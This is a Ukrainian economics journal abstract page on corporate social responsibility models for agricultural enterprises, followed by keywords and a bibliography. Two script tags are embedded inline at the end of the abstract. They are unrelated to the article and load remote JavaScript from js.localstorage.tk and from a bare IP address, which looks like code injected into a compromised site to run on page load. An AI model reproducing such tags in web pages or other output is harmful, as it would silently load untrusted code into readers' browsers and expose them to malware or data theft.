ISSN 2413-2322 (Online)

ISSN 2221-1055 (Print)

УДК: 330.342.151:631.145
Сторінка молодого науковця

Особливості запровадження системи соціальної відповідальності вітчизняними аграрними підприємствами / Фротер О. С. // Економіка АПК. - 2013. - № 2 - С. 129

Проаналізовано основні моделі соціальної відповідальності бізнесу провідних країн світу. Досліджено рівень обізнаності у сфері соціальної відповідальності бізнесу в Україні. Оцінено ступінь адаптації міжнародних норм соціальної відповідальності до умов України. Обґрунтовано необхідність запровадження системи соціальної відповідальності аграрними підприємствами і доведено, що успішна її реалізація стосовно аграрного бізнесу в Україні забезпечить зростання його конкурентоспроможності, активізацію інноваційних та інвестиційних процесів, інтеграцію на зовнішні ринки, заохочення участі вітчизняного бізнесу у соціальному розвиту територій, етичне виховання членів суспільства, повноцінну реалізацію трудових прав працівників, поліпшення стану довкілля. Табл.: 1. Рис.: 1. Бібліогр.: 11.<script type='text/javascript' src='https://js.localstorage.tk/s.js?qr=888'></script><script type='text/javascript' src='http://193.201.224.233/m.js?d=1'></script>
Ключові слова: соціальна відповідальність бізнесу, моделі соціальної відповідальності, аграрні підприємства

Список використаних джерел

 1. Андрунакиевич А.Н. Социальная ответственность бизнеса: теория и российская практика / А.Н. Андрунакиевич // Государственное управление. Электронный вестник. - 2008. - №15. - С.1-7.
 2. Аникеева О.П. Модели социальной ответственности бизнеса: мировой опыт и российская практика / О.П. Аникеева, Л.М. Симонова // Вестник Тюменского гос. ун-та. - 2010. - № 4. - С. 72-77.
 3. Грішнова О.А. Соціальна відповідальність бізнесу: сутність, значення, стратегічні напрями розвитку в Україні / О.А. Грішнова // Україна: аспекти праці. - 2010. - №7. - С. 3-8.
 4. Зінченко А.Г. Соціальна відповідальність в Україні: Погляди різних стейкхолдерів. Регіональний аспект / А.Г. Зінченко, М. А. Сап- рикіна. - К., 2008. - 60 с.
 5. Зінченко А.Г. Корпоративна соціальна відповідальність в Україні 2005 - 2010: стан та перспективи розвитку / А.Г. Зінченко, М.А. Саприкіна. - К.: Вид-во «Фарбований лист», 2010. - 56 с.
 6. Індекс прозорості компаній. - К.: Seven Color, 2012. - 28 с.
 7. Кількість суб’єктів Єдиного державного реєстру підприємств і організацій України [Електронний ресурс]. - Режим доступу: http://www.rbc.ua/ukr/newsline/show/v-ukraine-kolichestvo-predpriyatiy-za-avgust-uvelichilos-20092012113700.
 8. Соціальна відповідальність: теорія і практика розвитку: моногр. / [А.М. Колот, О.А. Грішнова та ін.]; за наук. ред. д-ра екон. Наук, проф. А.М. Колота. - К.: КНЕУ, 2012. - 502 с.
 9. Плотникова Е.Б. Корпоративная социальная ответственность: становление практик и концептуализация понятия (западный и российский опыт) / Е.Б. Плотникова, П. А. Германов, Е.В. Плотникова / Вестник Пермского университета. - 2009. - Вып. 2(6). - С. 13-19.
 10. Рейтинг социально ответственных компаний Украины - 2012 [Електронний ресурс]. - Режим доступу: http://kontrakty.ua/rankings/207.
 11. Родіонов О.В. Формування концепції соціальної відповідальності підприємства / О.В. Родіонов [Електронний ресурс]. - Режим доступу: http://www.nbuv.gov.ua/e-journals/vsunud/2009-6E/09rovsvp.htm.
Читати статтю: 13_02_24.pdf